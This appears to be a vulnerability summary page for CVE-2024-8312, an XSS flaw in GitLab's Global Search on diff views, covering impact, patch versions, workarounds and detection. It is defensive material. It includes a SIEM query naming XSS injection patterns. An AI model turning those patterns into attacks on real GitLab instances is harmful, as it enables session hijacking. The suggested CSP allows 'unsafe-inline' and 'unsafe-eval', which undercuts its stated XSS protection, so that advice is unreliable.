CVE-2024-8312
📋 TL;DR
This vulnerability allows attackers to inject malicious HTML into GitLab's Global Search field on diff views, leading to cross-site scripting (XSS). All GitLab CE/EE instances running affected versions are vulnerable, potentially compromising user sessions and data.
💻 Affected Systems
- GitLab Community Edition
- GitLab Enterprise Edition
📦 What is this software?
Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →Gitlab by Gitlab
GitLab is a complete DevOps platform providing source code management, CI/CD pipelines, security scanning, container registry, and collaboration tools used by millions of developers and thousands of enterprises worldwide. As both a cloud-hosted SaaS offering (GitLab.com) and self-managed software, G...
Learn more about Gitlab →⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, perform actions as authenticated users, redirect to malicious sites, or compromise administrator accounts leading to full system takeover.
Likely Case
Session hijacking, credential theft, defacement of GitLab interface, or data exfiltration from authenticated user sessions.
If Mitigated
Limited impact with proper Content Security Policy (CSP) headers, but still potential for UI manipulation within the vulnerable page context.
🎯 Exploit Status
Exploitation requires user interaction (visiting a malicious link or page) but XSS payloads are simple to craft once the injection point is known.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 17.3.6, 17.4.3, or 17.5.1
Vendor Advisory: https://gitlab.com/gitlab-org/gitlab/-/issues/481819
Restart Required: Yes
Instructions:
1. Backup your GitLab instance. 2. Update to GitLab 17.3.6, 17.4.3, or 17.5.1 using your package manager. 3. Restart GitLab services. 4. Verify the update completed successfully.
🔧 Temporary Workarounds
Disable Global Search
linuxTemporarily disable the Global Search feature to prevent exploitation.
gitlab-rails runner "ApplicationSetting.current.update!(global_search_enabled: false)"
Implement Content Security Policy
allAdd strict CSP headers to mitigate XSS impact.
Add to nginx/apache config: add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data:;";
🧯 If You Can't Patch
- Restrict network access to GitLab to trusted IPs only using firewall rules.
- Implement web application firewall (WAF) rules to block HTML/JavaScript injection patterns in search parameters.
🔍 How to Verify
Check if Vulnerable:
Check GitLab version via admin interface or run: sudo gitlab-rake gitlab:env:info | grep 'GitLab version'Check Version:
sudo gitlab-rake gitlab:env:info | grep 'GitLab version'Verify Fix Applied:
Confirm version is 17.3.6, 17.4.3, or 17.5.1 or higher. Test Global Search field with basic HTML injection attempts.📡 Detection & Monitoring
Log Indicators:
- Unusual search queries containing HTML/JavaScript tags in access logs
- Multiple failed login attempts following suspicious search activity
Network Indicators:
- HTTP requests to diff views with encoded HTML in query parameters
- Outbound connections to unknown domains following GitLab access
SIEM Query:
source="gitlab_access.log" AND (uri_path="/search" OR uri_path="/diffs") AND (query="<script>" OR query="javascript:" OR query="onerror=" OR query="onload=")